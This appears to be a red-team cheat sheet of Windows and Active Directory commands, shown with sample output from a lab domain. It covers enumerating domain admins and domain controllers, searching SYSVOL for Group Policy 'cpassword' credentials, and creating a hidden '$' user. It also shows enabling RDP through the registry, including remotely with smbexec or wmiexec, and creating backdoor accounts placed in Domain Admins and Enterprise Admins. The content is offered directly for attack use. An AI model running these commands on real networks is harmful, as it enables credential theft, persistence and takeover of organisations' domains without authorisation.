net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
runas /netonly /user:<DOMAIN>\<USER> cmd.exe
Use the /profile
flag for running the CMD in the context of the user explicitly on a domain joined system.
runas /profile /user:<DOMAIN>\<USER> cmd.exe
Or start an elevated prompt using CMD / PowerShell
powershell -Command "Start-Process cmd -Verb RunAs"
subst z: c:\
findstr /s /n /i /p cpassword \\<DOMAIN>\sysvol\*
$ whoami /all
USER INFORMATION
----------------
User Name SID
================ =============================================
win10\johndo S-1-5-21-4192065701-4228146649-662612674-1001
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================================= ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account and member of Administrators group Well-known group S-1-5-114 Group used for deny only
BUILTIN\Administrators Alias S-1-5-32-544 Group used for deny only
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\REMOTE INTERACTIVE LOGON Well-known group S-1-5-14 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
$ nltest /dclist:offsec.nl
Get list of DCs in domain 'offsec.nl' from '\\DC2016.offsec.nl'.
DC2008R2.offsec.nl [PDC] [DS] Site: Default-First-Site-Name
DC2016.offsec.nl [DS] Site: Default-First-Site-Name
DC2019.offsec.nl [DS] Site: Default-First-Site-Name
The command completed successfully
Local admin required.
net user $ LetMeIn123! /add /active:yes
You can enable (remotely) Remote Desktop (RDP) by adjusting the register key. Tip: use ‘smbexec.py’ / ‘wmiexec.py’ to enable on remote system where RDP is not enabled. Or use the CrackMapExec module RDP see CrackMapExec.
Enable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
Creation of the user ‘NewLaForMe’ - net user NewLAForMe "NotThatStrongPassword@" /add /Y
Adding the user to the group - net localgroup Administrators NewLAForMe /add
Creation of the user ‘NewDAForMe’ - net user NewDAForMe "NotThatStrongPassword@" /add /domain /Y
Adding the user to the group - net group "Domain Admins" NewDAForMe /add /domain
/ net group "Enterprise Admins" NewDAForMe /add /domain
Set user status to Active - net user NewDAForMe /active:yes /domain
Set user expire date - net user NewDAForMe /expires:07/19/23 /domain